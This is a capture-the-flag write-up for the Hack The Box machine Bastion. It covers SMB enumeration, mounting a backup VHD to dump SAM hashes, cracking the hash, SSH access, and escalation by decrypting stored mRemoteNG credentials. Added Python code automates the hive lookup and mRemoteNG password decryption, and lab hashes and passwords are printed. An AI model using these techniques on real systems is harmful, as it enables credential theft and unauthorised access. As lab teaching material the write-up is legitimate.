BASTION
- Layout for this exercise:

1 - INTRODUCTION
- The goal of this exercise is to work through a complete attack path against the vulnerable machine Bastion from the Hack The Box pentesting platform:
https://www.hackthebox.eu/
2 - ENUMERATION
- Bastion's IP is 10.10.10.134:

- Scanning with Nmap shows four open ports: 22, 135, 139 and 445.

- A service scan of those four ports confirms an SMB service running on port 445:


- An Nmap SMB share-enumeration script lists four shared folders:

- Connecting with smbclient:

- As expected, the administrative shares ADMIN$ and C$ are not accessible without administrator credentials:

- IPC$ can be connected to, but it yields nothing useful:

- The Backups share, however, is readable and holds a lot of very important information about Bastion:

- Downloading and reading note.txt gives a hint about backup-related problems:


- Downloading SDT65CB.tmp shows that the file is empty:


- Going into the folder WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351:

- It holds some .vhd and .xml files:

- VHD (Virtual Hard Disk) is a file format representing a virtual hard disk drive.
- It may contain everything found on a physical disk, such as partitions and a file system, which in turn can contain files and folders.
- It is typically used as the hard disk of a virtual machine; Windows image backups, like the one in this share, are stored as VHDs as well.
https://en.wikipedia.org/wiki/VHD_(file_format)
- Downloading the 1st .vhd file and running strings over it produces a lot of output, but nothing that leads to a useful hint for our purpose:


3 - EXPLOITATION
3.1 - Mounting the backup .vhd disk
- The 2nd .vhd disk is too large (5.4 GB) to download and check with strings, so a better approach is to mount the share over SMB and then mount the VHD from it directly.
- Installing cifs-utils:

- Creating folder /Backups:

- Mounting the Backups share on the local folder /Backups:

- The mounting process is successful:

- Looking for the 2nd .vhd disk:

- The guestmount program can be used to mount virtual machine filesystems and other disk images on the host.
- It uses libguestfs for access to the guest filesystem, and FUSE (the "filesystem in userspace") to make it appear as a mountable device.
http://libguestfs.org/guestmount.1.html
- Installing libguestfs-tools:

- Creating folder /mnt/vhd2:

- Using guestmount to mount the 2nd .vhd disk on local folder /mnt/vhd2:

- The mount succeeds, so we now have access to the entire backed-up filesystem under /mnt/vhd2:


3.2 - Getting the Security Account Manager (SAM)
- The Security Account Manager (SAM) is the registry hive where Windows stores the password hashes of local accounts.
- Each password is stored in hashed form, as an LM hash and/or an NT (NTLM) hash; the plaintext is never stored.
- Bastion runs Windows Server 2016, and LM hashing has been disabled by default since Windows Vista/Server 2008, so only NT hashes are present.
- The hive file lives at %SystemRoot%\System32\config\SAM and is loaded at runtime as HKLM\SAM. The hashes inside it are additionally encrypted with the boot key, which is derived from the SYSTEM hive in the same folder, so both files are needed to extract them:

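The mount-and-locate procedure of sections 3.1 and 3.2 as an added Python example (not code from the original write-up): it builds the mount.cifs and guestmount command lines (read-only, so the share and the backup image are never modified), picks the largest VHD instead of hard-coding its file name, and then walks the mounted image to find the SAM and SYSTEM hives that samdump2 needs. The host and share name are those enumerated above; the mountpoints /mnt/Backups and /mnt/vhd2, the function names and the constructed demo tree are this example's own assumptions.

```python
"""Added example, not from the original write-up: script the 3.1 mount steps
(mount the Backups share read-only, guestmount the big VHD read-only) and then
locate the SAM and SYSTEM hives samdump2 needs. Host and share come from the
enumeration; mountpoints, function names and the demo tree are assumptions."""
import os
import subprocess
from pathlib import Path

TARGET = "10.10.10.134"   # Bastion, from the enumeration section
SHARE = "Backups"         # the readable share found with smbclient


def cifs_mount_cmd(host, share, mountpoint):
    """argv for mount.cifs: null session (guest) and read-only, so nothing we do
    can modify the target's share while we work on it."""
    return ["mount", "-t", "cifs", "//%s/%s" % (host, share), mountpoint,
            "-o", "guest,ro"]


def guestmount_cmd(vhd, mountpoint):
    """argv for guestmount: --inspector picks the OS partition inside the VHD,
    --ro keeps the FUSE mount read-only so the backup image is never dirtied."""
    return ["guestmount", "--add", vhd, "--inspector", "--ro", mountpoint]


def run(cmd, dry_run=True):
    """Return the command line; execute it (needs root) only when dry_run is False."""
    line = " ".join(cmd)
    if not dry_run:
        subprocess.run(cmd, check=True)
    return line


def largest_file(root, suffix=".vhd"):
    """The 5.4 GB image is the system disk worth mounting: pick the biggest VHD
    under root rather than hard-coding its GUID-style file name."""
    found = [p for p in Path(root).rglob("*")
             if p.is_file() and p.suffix.lower() == suffix]
    return max(found, key=lambda p: p.stat().st_size) if found else None


def find_hives(mounted_root, wanted=("SAM", "SYSTEM")):
    """Return {hive name: path} for hives found under <anything>/System32/config.
    NTFS is case-insensitive but the guestmount view preserves the stored case,
    so compare case-insensitively instead of trusting one fixed spelling."""
    want = {w.lower(): w for w in wanted}
    hives = {}
    for dirpath, _dirs, files in os.walk(mounted_root):
        tail = tuple(p.lower() for p in Path(dirpath).parts[-2:])
        if tail != ("system32", "config"):
            continue
        for name in files:
            if name.lower() in want:
                hives[want[name.lower()]] = os.path.join(dirpath, name)
    return hives


def demo():
    """Constructed stand-in for the mounted share and VHD (no target needed):
    exercises largest_file and find_hives and returns what they picked."""
    import shutil
    import tempfile
    root = tempfile.mkdtemp()
    try:
        share = os.path.join(root, "share", "WindowsImageBackup", "L4mpje-PC")
        os.makedirs(share)
        for name, size in (("small.vhd", 1024), ("big.vhd", 4096)):
            with open(os.path.join(share, name), "wb") as fh:
                fh.write(b"\0" * size)
        cfg = os.path.join(root, "mnt", "Windows", "System32", "config")
        os.makedirs(cfg)
        for name in ("SAM", "SYSTEM", "SOFTWARE"):
            open(os.path.join(cfg, name), "wb").close()
        decoy = os.path.join(root, "mnt", "Users", "config")   # wrong place
        os.makedirs(decoy)
        open(os.path.join(decoy, "SAM"), "wb").close()
        vhd = largest_file(os.path.join(root, "share"))
        hives = find_hives(os.path.join(root, "mnt"))
        return {"vhd": vhd.name, "hives": sorted(hives)}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    share_mp, vhd_mp = "/mnt/Backups", "/mnt/vhd2"   # assumed mountpoints
    print(run(cifs_mount_cmd(TARGET, SHARE, share_mp)))   # dry run
    vhd = largest_file(share_mp) if os.path.isdir(share_mp) else None
    if vhd:
        print(run(guestmount_cmd(str(vhd), vhd_mp)))
        print(find_hives(vhd_mp))
    print(demo())
```

With both hives located, the extraction step is `samdump2 SYSTEM SAM` (SYSTEM first: it supplies the boot key, SAM holds the encrypted hashes). Keeping both mounts read-only is not just forensic hygiene; a VHD opened read-write by guestmount gets a dirty journal and may no longer match the backup on the share.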
- Using samdump2 on the SYSTEM and SAM hives (in that order) to retrieve the hashes of Bastion's local users:



- The Administrator and Guest accounts are disabled, so we note the NT hash of user L4mpje:
26112010952d963c8dc4217daec986d9
3.3 - Cracking the NTLM hash
- An NT hash cannot be decrypted, only looked up or cracked; Hashkiller's online service finds the plaintext for the hash from the previous point (note that submitting a hash to a public site discloses it to a third party, so on a real engagement crack it offline instead):


3.4 - Getting a remote shell
- With the credentials L4mpje:bureaulampje we can log in over SSH (port 22 was open in the Nmap scan) and get a remote shell:



4 - CAPTURING THE 1st FLAG
- Reading user.txt from user l4mpje's Desktop:

5 - PRIVILEGE ESCALATION
- As expected, the Administrator's Desktop is not accessible, so some form of privilege escalation is needed:

- Browsing the filesystem from the command line confirms the presence of the .vhd and .xml files found earlier:

- Going to L4mpje's home folder:

- Listing hidden items as well reveals many more entries in the home folder:

- Inside AppData\Roaming there is a very interesting folder named mRemoteNG:


- mRemoteNG is an open-source, multi-protocol remote connections manager; it stores its saved connections, credentials included, in the file confCons.xml:

- Reading confCons.xml we find an encrypted password for Administrator:

- Publicly available tools exist for decrypting mRemoteNG credentials, for instance the Python script mremoteng_decrypt.py:

- Running the script without arguments shows its available options:

- Passing the encrypted value with the -s option, which takes the encrypted string directly (the value is base64-encoded, as the trailing == suggests):

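What the decryption script does under the hood, as an added Python example (not the write-up's script and not mRemoteNG's own code): mRemoteNG 1.75 and later protect each Password attribute as base64(salt[16] || nonce[16] || AES-256-GCM ciphertext || tag[16]), with the key derived by PBKDF2-HMAC-SHA1 from the built-in master password "mR3m" (unless the user set one), the salt, and the KdfIterations count stored on the root element, and the salt reused as GCM associated data. The example parses a confCons.xml, splits the blob and decrypts it, and because GCM authenticates, it can also tell whether a candidate master password is right. It needs the `cryptography` package for AES-GCM; the sample XML and secret are constructed for the example, the target's real values are not reproduced, and all function names are this example's own.

```python
"""Added example, not the write-up's script: parse an mRemoteNG confCons.xml and
decrypt Password attributes with mRemoteNG's default scheme (PBKDF2-HMAC-SHA1
key, AES-256-GCM, value = base64(salt||nonce||ciphertext||tag), salt as AAD).
Requires the `cryptography` package. Sample XML/secret are constructed."""
import base64
import hashlib
import os
import xml.etree.ElementTree as ET

DEFAULT_MASTER = b"mR3m"          # mRemoteNG's built-in default master password
SALT_LEN = NONCE_LEN = TAG_LEN = 16


def _derive_key(password, salt, iterations):
    return hashlib.pbkdf2_hmac("sha1", password, salt, iterations, dklen=32)


def split_blob(b64):
    """salt, nonce, ciphertext, tag from the stored base64 value; garbage base64
    and values too short to hold the fixed fields are rejected explicitly."""
    raw = base64.b64decode(b64, validate=True)
    if len(raw) < SALT_LEN + NONCE_LEN + TAG_LEN:
        raise ValueError("value too short for salt||nonce||ciphertext||tag")
    salt = raw[:SALT_LEN]
    nonce = raw[SALT_LEN:SALT_LEN + NONCE_LEN]
    return salt, nonce, raw[SALT_LEN + NONCE_LEN:-TAG_LEN], raw[-TAG_LEN:]


def decrypt_password(b64, password=DEFAULT_MASTER, iterations=1000):
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM
    salt, nonce, ct, tag = split_blob(b64)
    key = _derive_key(password, salt, iterations)
    # GCM verifies the tag: a wrong master password raises InvalidTag instead
    # of returning garbage, which is what makes guessing the master feasible.
    return AESGCM(key).decrypt(nonce, ct + tag, salt).decode("utf-8")


def encrypt_password(plaintext, password=DEFAULT_MASTER, iterations=1000):
    """Forward direction, used here only to construct a sample value."""
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM
    salt, nonce = os.urandom(SALT_LEN), os.urandom(NONCE_LEN)
    key = _derive_key(password, salt, iterations)
    ct_tag = AESGCM(key).encrypt(nonce, plaintext.encode("utf-8"), salt)
    return base64.b64encode(salt + nonce + ct_tag).decode("ascii")


def try_master(b64, password, iterations=1000):
    """True if `password` authenticates the blob: lets you run a candidate list
    when the default master password has been changed."""
    from cryptography.exceptions import InvalidTag
    try:
        decrypt_password(b64, password, iterations)
        return True
    except InvalidTag:
        return False


def parse_confcons(xml_text):
    """(name, username, hostname, encrypted password, iterations) for every Node
    that carries a password. KdfIterations is an attribute of the root element."""
    root = ET.fromstring(xml_text)
    iterations = int(root.get("KdfIterations", "1000"))
    return [(n.get("Name"), n.get("Username"), n.get("Hostname"),
             n.get("Password"), iterations)
            for n in root.iter("Node") if n.get("Password")]


def decrypt_confcons(xml_text, password=DEFAULT_MASTER):
    return [(name, user, host, decrypt_password(enc, password, it))
            for name, user, host, enc, it in parse_confcons(xml_text)]


# Constructed confCons.xml skeleton; {pw} is filled with a freshly encrypted value
SAMPLE_TEMPLATE = """<mrng:Connections Name="Connections" EncryptionEngine="AES"
    BlockCipherMode="GCM" KdfIterations="1000" xmlns:mrng="http://mremoteng.org">
  <Node Name="DC" Type="Connection" Username="Administrator" Hostname="127.0.0.1"
        Protocol="RDP" Password="{pw}" />
</mrng:Connections>"""


def demo(secret="example-secret"):
    """Round trip: encrypt a constructed secret, embed it in the sample XML,
    then parse and decrypt it the way you would a recovered confCons.xml."""
    xml_text = SAMPLE_TEMPLATE.format(pw=encrypt_password(secret))
    return decrypt_confcons(xml_text)


if __name__ == "__main__":
    print(demo())
```

The design point to take away: the cryptography itself is sound (authenticated AES-GCM with a salted, iterated KDF), but the key is derived from a master password that defaults to a constant shipped in the binary, so any readable confCons.xml whose owner never set a master password decrypts with no secret at all. Check KdfIterations on the root element before decrypting; a file written with a non-default iteration count will fail authentication if you assume 1000.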
- So finally we have the Administrator's password: thXLHM96BeKL0ER2
- Connecting over SSH as Administrator gives a privileged remote shell:



6 - CAPTURING THE 2nd FLAG
- Reading root.txt:
